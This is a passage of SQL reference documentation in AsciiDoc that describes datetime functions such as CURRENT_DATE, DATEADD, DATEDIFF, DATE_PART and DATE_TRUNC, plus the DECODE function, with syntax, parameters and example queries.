is\r\nnot a string value.\r\n\r\n[[examples_of_current]]\r\n=== Examples of CURRENT\r\n\r\n* The PROJECT table contains a column SHIP_TIMESTAMP of data type\r\nTIMESTAMP. Update a row by using the CURRENT value:\r\n+\r\n```\r\nUPDATE persnl.project\r\nSET ship_timestamp = CURRENT WHERE projcode = 1000;\r\n```\r\n\r\n<<<\r\n[[current_date_function]]\r\n== CURRENT_DATE Function\r\n\r\nThe CURRENT_DATE function returns the local current date as a value of\r\ntype DATE.\r\n\r\nThe function is evaluated once when the query starts execution and is\r\nnot reevaluated (even if it is a long running query).\r\n\r\n```\r\nCURRENT_DATE\r\n```\r\n\r\nThe CURRENT_DATE function returns the current date, such as 2008-09-28.\r\nThe value returned is a value of type DATE, not a string value.\r\n\r\n[[examples_of_current_date]]\r\n=== Examples of CURRENT_DATE\r\n\r\n* Select rows from the ORDERS table based on the current date:\r\n+\r\n```\r\nSELECT * FROM sales.orders\r\nWHERE deliv_date >= CURRENT_DATE;\r\n```\r\n\r\n* The PROJECT table has a column EST_COMPLETE of type INTERVAL DAY. If\r\nthe current date is the start date of your project, determine the\r\nestimated date of completion:\r\n+\r\n```\r\nSELECT projdesc, CURRENT_DATE + est_complete FROM persnl.project;\r\n\r\nProject\/Description (EXPR)\r\n------------------- ----------\r\nSALT LAKE CITY 2008-01-18\r\nROSS PRODUCTS 2008-02-02\r\nMONTANA TOOLS 2008-03-03\r\nAHAUS TOOL\/SUPPLY 2008-03-03\r\nTHE WORKS 2008-02-02\r\nTHE WORKS 2008-02-02\r\n\r\n--- 6 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[current_time_function]]\r\n== CURRENT_TIME Function\r\n\r\nThe CURRENT_TIME function returns the current local time as a value of\r\ntype TIME.\r\n\r\nThe function is evaluated once when the query starts execution and is\r\nnot reevaluated (even if it is a long running query).\r\n\r\n```\r\nCURRENT_TIME [(precision)]\r\n```\r\n\r\n* `_precision_`\r\n+\r\nis an integer value in the range 0 to 6 that specifies the precision of\r\n(the number of decimal places in) the fractional seconds in the returned\r\nvalue. The default is 0.\r\n+\r\nFor example, the function CURRENT_TIME (2) returns the current time as a\r\nvalue of data type TIME, where the precision of the fractional seconds\r\nis 2, for example, 14:01:59.30. The value returned is not a string\r\nvalue.\r\n\r\n[[examples_of_current_time]]\r\n=== Examples of CURRENT_TIME\r\n\r\n* Use CURRENT_DATE and CURRENT_TIME as a value in an inserted row:\r\n+\r\n```\r\nINSERT INTO stats.logfile (user_key, run_date, run_time, user_name)\r\nVALUES (001, CURRENT_DATE, CURRENT_TIME, 'JuBrock');\r\n```\r\n\r\n<<<\r\n[[current_timestamp_function]]\r\n== CURRENT_TIMESTAMP Function\r\n\r\nThe CURRENT_TIMESTAMP function returns a value of type TIMESTAMP based\r\non the current local date and time.\r\n\r\nThe function is evaluated once when the query starts execution and is\r\nnot reevaluated (even if it is a long running query).\r\n\r\nYou can also use the <<current_function,CURRENT Function>>.\r\n\r\n```\r\nCURRENT_TIMESTAMP [(_precision_)]\r\n```\r\n\r\n* `_precision_`\r\n+\r\nis an integer value in the range 0 to 6 that specifies the precision of\r\n(the number of decimal places in) the fractional seconds in the returned\r\nvalue. The default is 6.\r\n+\r\nFor example, the function CURRENT_TIMESTAMP (2) returns the current date\r\nand time as a value of data type TIMESTAMP, where the precision of the\r\nfractional seconds is 2; for example, 2008-06-26 09:01:20.89. The value\r\nreturned is not a string value.\r\n\r\n\r\n[[examples_of_current_timestamp]]\r\n=== Examples of CURRENT_TIMESTAMP\r\n\r\n* The PROJECT table contains a column SHIP_TIMESTAMP of data type\r\nTIMESTAMP. Update a row by using the CURRENT_TIMESTAMP value:\r\n+\r\n```\r\nUPDATE persnl.project\r\nSET ship_timestamp = CURRENT_TIMESTAMP WHERE projcode = 1000;\r\n```\r\n\r\n<<<\r\n[[current_user_function]]\r\n== CURRENT_USER Function\r\n\r\nThe CURRENT_USER function returns the database user name of the current\r\nuser who invoked the function. The current user is the authenticated\r\nuser who started the session. That database user name is used for\r\nauthorization of SQL statements in the current session.\r\n\r\n```\r\nCURRENT_USER\r\n```\r\n\r\nThe CURRENT_USER function is similar to the <<user_function,USER Function>>.\r\n\r\n[[considerations_for_current_user]]\r\n=== Considerations for CURRENT_USER\r\n\r\n* This function can be specified only in the top level of a SELECT statement.\r\n* The value returned is string data type VARCHAR(128) and is in ISO8859-1 encoding.\r\n\r\n\r\n[[examples_of_current_user]]\r\n=== Examples of CURRENT_USER\r\n\r\n* This example retrieves the database user name for the current user:\r\n+\r\n```\r\nSELECT CURRENT_USER FROM (values(1)) x(a);\r\n\r\n(EXPR)\r\n-----------------------\r\nTSHAW\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[date_add_function]]\r\n== DATE_ADD Function\r\n\r\nThe DATE_ADD function adds the interval specified by\r\n_interval_expression_ to _datetime_expr_. If the specified interval is\r\nin years or months, DATE_ADD normalizes the result. See\r\n<<standard_normalization,Standard Normalization>>. The type of the\r\n_datetime_expr_ is returned, unless the _interval_expression_ contains\r\nany time components, then a timestamp is returned.\r\n\r\nDATE_ADD is a {project-name} SQL extension.\r\n\r\n```\r\nDATE_ADD (datetime-expr, interval-expression)\r\n```\r\n\r\n* `_datetime-expr_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n* `_interval-expression_`\r\n+\r\nis an expression that can be combined in specific ways with addition\r\noperators. The _interval_expression_ accepts all interval expression\r\ntypes that the {project-name} database software considers as valid interval\r\nexpressions. See <<interval_value_expressions,Interval Value Expressions>>.\r\n\r\n<<<\r\n[[examples_of_date_add]]\r\n=== Examples of DATE_ADD\r\n\r\n* This function returns the value DATE '2007-03-07'\r\n+\r\n```\r\nDATE_ADD(DATE '2007-02-28', INTERVAL '7' DAY)\r\n```\r\n\r\n* This function returns the value DATE '2008-03-06'\r\n+\r\n```\r\nDATE_ADD(DATE '2008-02-28', INTERVAL '7' DAY)\r\n```\r\n\r\n* This function returns the timestamp '2008-03-07 00:00:00'\r\n+\r\n```\r\nDATE_ADD(timestamp'2008-02-29 00:00:00', INTERVAL '7' DAY)\r\n```\r\n\r\n* This function returns the timestamp '2008-02-28 23:59:59'\r\n+\r\n```\r\nDATE_ADD(timestamp '2007-02-28 23:59:59', INTERVAL '12' MONTH)\r\n```\r\n+\r\nNOTE: compare this example with the last example under DATE_SUB.\r\n\r\n<<<\r\n[[date_sub_function]]\r\n== DATE_SUB Function\r\n\r\nThe DATE_SUB function subtracts the specified _interval_expression_ from\r\n_datetime_expr_. If the specified interval is in years or months,\r\nDATE_SUB normalizes the result. See <<standard_normalization,Standard Normalization>>.\r\n\r\nThe type of the _datetime_expr_ is returned, unless the _interval_expression_ contains\r\nany time components, then a timestamp is returned.\r\n\r\nDATE_SUB is a {project-name} SQL extension.\r\n\r\n```\r\nDATE_SUB (datetime-expr, interval-expression)\r\n```\r\n\r\n* `_datetime-expr_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime_Value_Expression>>.\r\n\r\n* `_interval-expression_`\r\n+\r\nis an expression that can be combined in specific ways with subtraction\r\noperators. The _interval_expression_ accepts all interval expression\r\ntypes that the {project-name} database software considers as valid interval\r\nexpressions. see <<interval_value_expressions,Interval Value Expressions>>.\r\n\r\n<<<\r\n[[examples_of_date_sub]]\r\n=== Examples of DATE_SUB\r\n\r\n* This function returns the value DATE '2009-02-28'\r\n+\r\n```\r\nDATE_SUB(DATE '2009-03-07', INTERVAL'7' DAY)\r\n```\r\n\r\n* This function returns the value DATE '2008-02-29'\r\n+\r\n```\r\nDATE_SUB(DATE '2008-03-07', INTERVAL'7' DAY)\r\n```\r\n\r\n* This function returns the timestamp '2008-02-29 00:00:00'\r\n+\r\n```\r\nDATE_SUB(timestamp '2008-03-31 00:00:00', INTERVAL '31' DAY)\r\n```\r\n\r\n* This function returns the timestamp '2007-02-28 23:59:59'\r\n+\r\n```\r\nDATE_SUB(timestamp '2008-02-29 23:59:59', INTERVAL '12' MONTH)\r\n```\r\n\r\n\r\n<<<\r\n[[dateadd_function]]\r\n== DATEADD Function\r\n\r\nThe DATEADD function adds the interval of time specified by _datepart_\r\nand _num-expr_ to _datetime-expr_. If the specified interval is in\r\nyears or months, DATEADD normalizes the result. See\r\n<<standard_normalization,Standard Normalization>>. The type of the\r\n_datetime-expr_ is returned, unless the interval expression contains any\r\ntime components, then a timestamp is returned.\r\n\r\nDATEADD is a {project-name} SQL extension.\r\n\r\n```\r\nDATEADD(datepart, num-expr, datetime-expr)\r\n```\r\n\r\n* `_datepart_`\r\n+\r\nis YEAR, MONTH, DAY, HOUR, MINUTE, SECOND, QUARTER, WEEK, or one of the\r\nfollowing abbreviations:\r\n+\r\n[cols=\"15%,85%\"]\r\n|===\r\n| YEAR | _YY_ and _YYYY_\r\n| MONTH | _M_ and _MM_\r\n| DAY | _D_ and _DD_\r\n| HOUR | _HH_\r\n| MINUTE | _MI_ and _M_\r\n| SECOND | _SS_ and _S_\r\n| QUARTER | _Q_ and _QQ_\r\n| WEEK | _WW_ and _WK_\r\n|===\r\n\r\n\r\n* `_num-expr_`\r\n+\r\nis an SQL exact numeric value expression that specifies how many\r\n_datepart_ units of time are to be added to _datetime_expr_. If\r\n_num_expr_ has a fractional portion, it is ignored. If _num_expr_ is\r\nnegative, the return value precedes _datetime_expr_ by the specified\r\namount of time. See <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n* `_datetime-expr_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. The type of the _datetime_expression_ is returned, unless the\r\ninterval expression contains any time components, then a timestamp is\r\nreturned. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n<<<\r\n[[examples_of_dateadd]]\r\n=== Examples of DATEADD\r\n\r\n* This function adds seven days to the date specified in _start_date_\r\n+\r\n```\r\nDATEADD(DAY, 7,start_date)\r\n```\r\n\r\n* This function returns the value DATE '2009-03-07'\r\n+\r\n```\r\nDATEADD(DAY, 7 , DATE '2009-02-28')\r\n```\r\n\r\n* This function returns the value DATE '2008-03-06'\r\n+\r\n```\r\nDATEADD(DAY, 7, DATE '2008-02-28')\r\n```\r\n\r\n* This function returns the timestamp '2008-03-07 00:00:00'\r\n+\r\n```\r\nDATEADD(DAY, 7, timestamp'2008-02-29 00:00:00')\r\n```\r\n\r\n<<<\r\n[[datediff_function]]\r\n== DATEDIFF Function\r\n\r\nThe DATEDIFF function returns the integer value for the number of\r\n_datepart_ units of time between _startdate_ and _enddate_. If\r\n_enddate_ precedes _startdate_, the return value is negative or zero.\r\n\r\nDATEDIFF is a {project-name} SQL extension.\r\n\r\n```\r\nDATEDIFF (datepart, startdate, enddate)\r\n```\r\n\r\n* `datepart`\r\n+\r\nis YEAR, MONTH, DAY, HOUR, MINUTE, SECOND, QUARTER, WEEK, or one of the\r\nfollowing abbreviations:\r\n+\r\n[cols=\"15%,85%\"]\r\n|===\r\n| YEAR | _YY_ and _YYYY_\r\n| MONTH | _M_ and _MM_\r\n| DAY | _D_ and _DD_\r\n| HOUR | _HH_\r\n| MINUTE | _MI_ and _M_\r\n| SECOND | _SS_ and _S_\r\n| QUARTER | _Q_ and QQ\r\n| WEEK | _WW_ and _WK_\r\n|===\r\n\r\n* `startdate`\r\n+\r\nmay be of type DATE or TIMESTAMP.\r\nSee <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n* `enddate`\r\n+\r\nmay be of type DATE or TIMESTAMP.\r\nSee <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\nThe method of counting crossed boundaries such as days, minutes, and\r\nseconds makes the result given by DATEDIFF consistent across all data\r\ntypes. The result is a signed integer value equal to the number of\r\ndatepart boundaries crossed between the first and second date.\r\n\r\nFor example, the number of weeks between Sunday, January 4, and Sunday,\r\nJanuary 1 , is 1. The number of months between March 31 and April 1\r\nwould be 1 because the month boundary is crossed from March to April.\r\nThe DATEDIFF function generates an error if the result is out of range\r\nfor integer values. For seconds, the maximum number is equivalent to\r\napproximately 68 years. The DATEDIFF function generates an error if a\r\ndifference in weeks is requested and one of the two dates precedes\r\nJanuary 7 of the year 0001.\r\n\r\n<<<\r\n[[examples_of_datediff]]\r\n=== Examples of DATEDIFF\r\n\r\n* This function returns the value of 0 because no one-second boundaries\r\nare crossed.\r\n+\r\n```\r\nDATEDIFF( SECOND\r\n , TIMESTAMP '2006-09-12 11:59:58.999998'\r\n , TIMESTAMP '2006-09-12 11:59:58.999999'\r\n )\r\n```\r\n\r\n* This function returns the value 1 because a one-second boundary is\r\ncrossed even though the two timestamps differ by only one microsecond.\r\n+\r\n```\r\nDATEDIFF( SECOND\r\n , TIMESTAMP '2006-09-12 11:59:58.999999'\r\n , TIMESTAMP '2006-09-12 11:59:59.000000'\r\n )\r\n```\r\n\r\n* This function returns the value of 0.\r\n+\r\n```\r\nDATEDIFF( YEAR\r\n , TIMESTAMP '2006-12-31 23:59:59.999998'\r\n , TIMESTAMP '2006-12-31 23:59:59.999999'\r\n )\r\n```\r\n\r\n* This function returns the value of 1 because a year boundary is\r\ncrossed.\r\n+\r\n```\r\nDATEDIFF( YEAR\r\n , TIMESTAMP '2006-12-31 23:59:59.999999'\r\n , TIMESTAMP '2007-01-01 00:00:00.000000'\r\n )\r\n```\r\n\r\n* This function returns the value of 2 because two WEEK boundaries are\r\ncrossed.\r\n+\r\n```\r\nDATEDIFF(WEEK, DATE '2006-01-01', DATE '2006-01-09')\r\n```\r\n\r\n* This function returns the value of -29.\r\n+\r\n```\r\nDATEDIFF(DAY, DATE '2008-03-01', DATE '2008-02-01')\r\n```\r\n\r\n<<<\r\n[[dateformat_function]]\r\n=== DATEFORMAT Function\r\n\r\nThe DATEFORMAT function returns a datetime value as a character string\r\nliteral in the DEFAULT, USA, or EUROPEAN format. The data type of the\r\nresult is CHAR.\r\n\r\nDATEFORMAT is a {project-name} SQL extension.\r\n\r\n```\r\nDATEFORMAT (datetime-expression,{DEFAULT | USA | EUROPEAN})\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE, TIME,\r\nor TIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n* `DEFAULT | USA | EUROPEAN`\r\n+\r\nspecifies a format for a datetime value. See <<datetime_literals,Datetime Literals>>.\r\n\r\n[[considerations_for_dateformat]]\r\n=== Considerations for DATEFORMAT\r\n\r\nThe DATEFORMAT function returns the datetime value in ISO8859-1\r\nencoding.\r\n\r\n[[examples_of_dateformat]]\r\n=== Examples of DATEFORMAT\r\n\r\n* Convert a datetime literal in DEFAULT format to a string in USA\r\nformat: DATEFORMAT (TIMESTAMP '2008-06-20 14:20:20.00', USA) The\r\nfunction returns this string literal:\r\n+\r\n```\r\n'06\/20\/2008 02:20:20.00 PM'\r\n```\r\n\r\n* Convert a datetime literal in DEFAULT format to a string in European\r\nformat: DATEFORMAT (TIMESTAMP '2008-06-20 14:20:20.00', EUROPEAN) The\r\nfunction returns this string literal:\r\n+\r\n```\r\n'20.06.2008 14.20.20.00'\r\n```\r\n\r\n<<<\r\n[[date_part_function_of_an_interval]]\r\n== DATE_PART Function (of an Interval)\r\n\r\nThe DATE_PART function extracts the datetime field specified by _text_\r\nfrom the _interval_ value specified by _interval_ and returns the result\r\nas an exact numeric value. The DATE_PART function accepts the\r\nspecification of 'YEAR', 'MONTH', 'DAY', 'HOUR', 'MINUTE', or 'SECOND'\r\nfor text.\r\n\r\nDATE_PART is a {project-name} SQL extension.\r\n\r\n```\r\nDATEPART (text, interval)\r\n```\r\n\r\n* `_text_`\r\n+\r\nspecifies YEAR, MONTH, DAY, HOUR, MINUTE, or SECOND. The value must be\r\nenclosed in single quotes.\r\n\r\n* `_interval_`\r\n+\r\n_interval_ accepts all interval expression types that the {project-name}\r\ndatabase software considers as valid interval expressions. See\r\n<<interval_value_expressions,Interval Value Expressions>>.\r\n\r\nThe DATE_PART(_text_, _interval_) is equivalent to EXTRACT(_text_,\r\n_interval_), except that the DATE_PART function requires single quotes\r\naround the text specification, where EXTRACT does not allow single\r\nquotes.\r\n\r\nWhen SECOND is specified the fractional part of the second is returned.\r\n\r\n[[examples_of_date_part]]\r\n=== Examples of DATE_PART\r\n\r\n* This function returns the value of 7.\r\n+\r\n```\r\nDATE_PART('DAY', INTERVAL '07:04' DAY TO HOUR)\r\n```\r\n\r\n* This function returns the value of 6.\r\n+\r\n```\r\nDATE_PART('MONTH', INTERVAL '6' MONTH)\r\n```\r\n\r\n* This function returns the value of 36.33.\r\n+\r\n```\r\nDATE_PART('SECOND', INTERVAL '5:2:15:36.33' DAY TO SECOND(2))\r\n```\r\n\r\n<<<\r\n[[date_part_function_of_a_timestamp]]\r\n== DATE_PART Function (of a Timestamp)\r\n\r\nThe DATE_PART function extracts the datetime field specified by _text_\r\nfrom the datetime value specified by _datetime_expr_ and returns the\r\nresult as an exact numeric value. The DATE_PART function accepts the\r\nspecification of 'YEAR', 'YEARQUARTER', 'YEARMONTH', 'YEARWEEK',\r\n'MONTH', 'DAY', 'HOUR', 'MINUTE', or 'SECOND' for text.\r\n\r\nThe DATE_PART function of a timestamp can be changed to DATE_PART\r\nfunction of a datetime because the second argument can be either a\r\ntimestamp or a date expression.\r\n\r\nDATE_PART is a {project-name} extension.\r\n\r\n```\r\nDATEPART(text, datetime-expr)\r\n```\r\n\r\n* `_text_`\r\n+\r\nspecifies YEAR, YEARQUARTER, YEARMONTH, YEARWEEK, MONTH, DAY, HOUR,\r\nMINUTE, or SECOND. The value must be enclosed in single quotes.\r\n\r\n** *YEARMONTH*: Extracts the year and the month, as a 6-digit integer of\r\nthe form yyyymm (100 \\* year + month).\r\n** *YEARQUARTER*: Extracts the year and quarter, as a 5-digit integer of\r\nthe form yyyyq, (10 \\* year + quarter) with q being 1 for the first\r\nquarter, 2 for the second, and so on.\r\n** *YEARWEEK*: Extracts the year and week of the year, as a 6-digit integer\r\nof the form yyyyww (100 \\* year + week). The week number will be computed\r\nin the same way as in the WEEK function.\r\n\r\n* `_datetime-expr_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\nDATE_PART(_text_, _datetime-expr_) is mostly equivalent to\r\nEXTRACT(_text_, _datetime-expr_), except that DATE_PART requires\r\nsingle quotes around the text specification where EXTRACT does not allow\r\nsingle quotes. In addition, you cannot use the YEARQUARTER, YEARMONTH,\r\nand YEARWEEK text specification with EXTRACT.\r\n\r\n<<<\r\n[[examples_of_date_part]]\r\n=== Examples of DATE_PART\r\n\r\n* This function returns the value of 12.\r\n+\r\n```\r\nDATE_PART('month', date'12\/05\/2006')\r\n```\r\n\r\n* This function returns the value of 2006.\r\n+\r\n```\r\nDATE_PART('year', date'12\/05\/2006')\r\n```\r\n\r\n* This function returns the value of 31.\r\n+\r\n```\r\nDATE_PART('day', TIMESTAMP '2006-12-31 11:59:59.999999')\r\n```\r\n\r\n* This function returns the value 201 07.\r\n+\r\n```\r\nDATE_PART('YEARMONTH', date '2011-07-25')\r\n```\r\n\r\n<<<\r\n[[date_trunc_function]]\r\n== DATE_TRUNC Function\r\n\r\nThe DATE_TRUNC function returns a value of type TIMESTAMP, which has all\r\nfields of lesser precision than _text_ set to zero (or 1 in the case of\r\nmonths or days).\r\n\r\nDATE_TRUNC is a {project-name} SQL extension.\r\n\r\n```\r\nDATE_TRUNC(text, datetime-expr)\r\n```\r\n\r\n* `_text_`\r\n+\r\nspecifies 'YEAR', 'MONTH', 'DAY', 'HOUR', 'MINUTE', or 'SECOND'. The\r\nDATE_TRUNC function also accepts the specification of 'CENTURY' or 'DECADE'.\r\n\r\n* `_datetime_expr_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. DATE_TRUNC returns a value of type TIMESTAMP which has all\r\nfields of lesser precision than _text_ set to zero (or 1 in the case of\r\nmonths or days). See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n<<<\r\n[[examples_of_date_trunc]]\r\n=== Examples of DATE_TRUNC\r\n\r\n* This function returns the value of TIMESTAMP '2006-12-31 00:00:00'.\r\n+\r\n```\r\nDATE_TRUNC('day', TIMESTAMP '2006-12-31 11:59:59')\r\n```\r\n\r\n* This function returns the value of TIMESTAMP '2006-01-01 00:00:00'\r\n+\r\n```\r\nDATE_TRUNC('YEAR', TIMESTAMP '2006-12-31 11:59:59')\r\n```\r\n\r\n* This function returns the value of TIMESTAMP '2006-12-01 00:00:00'\r\n+\r\n```\r\nDATE_TRUNC('MONTH', DATE '2006-12-31')\r\n```\r\n\r\nRestrictions:\r\n\r\n* DATE_TRUNC( 'DECADE', …) cannot be used on years less than 10.\r\n* DATE_TRUNC( 'CENTURY', …) cannot be used on years less than 100.\r\n\r\n<<<\r\n[[day_function]]\r\n== DAY Function\r\n\r\nThe DAY function converts a DATE or TIMESTAMP expression into an INTEGER\r\nvalue in the range 1 through 31 that represents the corresponding day of\r\nthe month. The result returned by the DAY function is equal to the\r\nresult returned by the DAYOFMONTH function.\r\n\r\nDAY is a {project-name} SQL extension.\r\n\r\n```\r\nDAY (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_day]]\r\n=== Examples of Day\r\n\r\n* Return an integer that represents the day of the month from the\r\nstart date column of the project table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, DAY(start_date)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- ------\r\n2008-04-10 2008-04-21 08:15:00.000000 10\r\n```\r\n\r\n<<<\r\n[[dayname_function]]\r\n== DAYNAME Function\r\n\r\nThe DAYNAME function converts a DATE or TIMESTAMP expression into a\r\ncharacter literal that is the name of the day of the week (Sunday,\r\nMonday, and so on).\r\n\r\nDAYNAME is a {project-name} SQL extension.\r\n\r\n```\r\nDAYNAME (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[considerations_for_dayname]]\r\n=== Considerations for DAYNAME\r\n\r\nThe DAYNAME function returns the name of the day in ISO8859-1.\r\n\r\n[[examples_of_dayname]]\r\n=== Examples of DAYNAME\r\n\r\nReturn the name of the day of the week from the start date column in the\r\nproject table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, DAYNAME(start_date)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- ---------\r\n2008-04-10 2008-04-21 08:15:00.000000 Thursday\r\n```\r\n\r\n<<<\r\n[[dayofmonth_function]]\r\n== DAYOFMONTH Function\r\n\r\nThe DAYOFMONTH function converts a DATE or TIMESTAMP expression into an\r\nINTEGER value in the range 1 through 31 that represents the\r\ncorresponding day of the month. The result returned by the DAYOFMONTH\r\nfunction is equal to the result returned by the DAY function.\r\n\r\nDAYOFMONTH is a {project-name} SQL extension.\r\n\r\n```\r\nDAYOFMONTH (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_dayofmonth]]\r\n=== Examples of DAYOFMONTH\r\n\r\n* Return an integer that represents the day of the month from the\r\nstart date column of the project table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, DAYOFMONTH(start_date)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- ------\r\n2008-04-10 2008-04-21 08:15:00.000000 10\r\n```\r\n\r\n<<<\r\n[[dayofweek_function]]\r\n== DAYOFWEEK Function\r\n\r\nThe DAYOFWEEK function converts a DATE or TIMESTAMP expression into an\r\nINTEGER value in the range 1 through 7 that represents the corresponding\r\nday of the week. The value 1 represents Sunday, 2 represents Monday, and\r\nso forth.\r\n\r\nDAYOFWEEK is a {project-name} SQL extension.\r\n\r\n```\r\nDAYOFWEEK (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_dayofweek]]\r\n=== Examples of DAYOFWEEK\r\n\r\n* Return an integer that represents the day of the week from the\r\nSTART_DATE column in the PROJECT table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, DAYOFWEEK(start_date)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- ------\r\n2008-04-10 2008-04-21 08:15:00.000000 5\r\n```\r\n+\r\nThe value returned is 5, representing Thursday. The week begins on Sunday.\r\n\r\n<<<\r\n[[dayofyear_function]]\r\n== DAYOFYEAR Function\r\n\r\nThe DAYOFYEAR function converts a DATE or TIMESTAMP expression into an\r\nINTEGER value in the range 1 through 366 that represents the\r\ncorresponding day of the year.\r\n\r\nDAYOFYEAR is a {project-name} SQL extension.\r\n\r\n```\r\nDAYOFYEAR (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_dayofyear]]\r\n=== Examples of DAYOFYEAR\r\n\r\n* Return an integer that represents the day of the year from the\r\nstart date column in the project table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, DAYOFYEAR(start_date)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- --------------------\r\n2008-04-10 2008-04-21 08:15:00.000000 |101\r\n```\r\n\r\n<<<\r\n[[Decode_function]]\r\n== DECODE Function\r\n\r\nThe DECODE function compares _expr_ to each _test_expr_ value one by one\r\nin the order provided. If _expr_ is equal to a _test_expr_, then the\r\ncorresponding _retval_ is returned. If no match is found, _default_ is\r\nreturned. If no match is found and _default_ is omitted, NULL is\r\nreturned.\r\n\r\nDECODE is a {project-name} SQL extension.\r\n\r\n```\r\nDECODE (expr, test-expr, retval [, test-expr2, retval2 ... ] [ , default ] )\r\n```\r\n\r\n* `_expr_`\r\n+\r\nis an SQL expression.\r\n\r\n* `_test-expr_, _test-expr_, …`\r\n+\r\nare each an SQL expression of a type comparable to that of _expr_.\r\n\r\n* `_retval_`\r\n+\r\nis an SQL expression.\r\n\r\n* `_default_, _retval2_, …`\r\n+\r\nare each an SQL expression of a type comparable to that of _retval_.\r\n\r\n[[considerations_for_decode]]\r\n=== Considerations for DECODE\r\n\r\nIn a DECODE function, two nulls are considered to be equivalent. If\r\n_expr_ is null, then the returned value is the _retval_ of the first\r\n_test-expr_ that is also null.\r\n\r\nThe _expr_, _test-expr_, _retval_, and _default_ values can be\r\nderived from expressions.\r\n\r\nThe arguments can be any of the numeric types or character types.\r\nHowever, _expr_ and each _test-expr_ value must be of comparable types.\r\nIf _expr_ and _test-expr_ values are character types, they must be in\r\nthe same character set (to be comparable types.)\r\n\r\nAll the _retval_ values and the _default_ value, if any, must be of\r\ncomparable types.\r\n\r\nIf _expr_ and a _test-expr_ value are character data, the comparison is\r\nmade using non-padded comparison semantics.\r\n\r\nIf _expr_ and a _test-expr_ value are numeric data, the comparison is\r\nmade with a temporary copy of one of the numbers, according to defined\r\nrules of conversion. For example, if one number is INTEGER and the other\r\nis DECIMAL, the comparison is made with a temporary copy of the integer\r\nconverted to a decimal.\r\n\r\nIf all the possible return values are of fixed-length character types,\r\nthe returned value is a fixed-length character string with size equal to\r\nthe maximum size of all the possible return value types.\r\n\r\nIf any of the possible return values is a variable-length character\r\ntype, the returned value is a variable-length character string with\r\nmaximum size of all the possible return value types.\r\n\r\nIf all the possible return values are of integer types, the returned\r\nvalue is the same type as the largest integer type of all the possible\r\nreturn values.\r\n\r\nIf the returned value is of type FLOAT, the precision is the maximum\r\nprecision of all the possible return values.\r\n\r\nIf all the possible returned values are of the same non-integer, numeric\r\ntype (REAL, FLOAT, DOUBLE PRECISION, NUMERIC, or DECIMAL), the returned\r\nvalue is of that same type.\r\n\r\nIf all the possible return values are of numeric types but not all the\r\nsame, and at least one is REAL, FLOAT, or DOUBLE PRECISION, then the\r\nreturned value is of type DOUBLE PRECISION.\r\n\r\nIf all the possible return values are of numeric types but not all the\r\nsame, none are REAL, FLOAT, or DOUBLE PRECISION, and at least one is of\r\ntype NUMERIC, then the returned value is of type NUMERIC.\r\n\r\nIf all the possible return values are of numeric types, none are\r\nNUMERIC, REAL, FLOAT, or DOUBLE PRECISION, and at least one is of type\r\nDECIMAL, then the returned value will be of type DECIMAL.\r\n\r\nIf the returned value is of type NUMERIC or DECIMAL, it has a precision\r\nequal to the sum of:\r\n\r\n* The maximum scale of all the possible return value types and\r\n* The maximum value of (precision - scale) for all the possible return value types.\r\nHowever, the precision will not exceed 18.\r\n\r\nThe scale of the returned value is the minimum of:\r\n\r\n* The maximum scale of all the possible return value types and\r\n* 18 - (the maximum value of (precision - scale) for all the possible\r\nreturn value types).\r\n\r\nThe number of components in the DECODE function, including _expr_,\r\n_test-exprs_, _retvals_, and _default_, has no limit other than\r\nthe general limit of how big an SQL expression can be. However, large\r\nlists do not 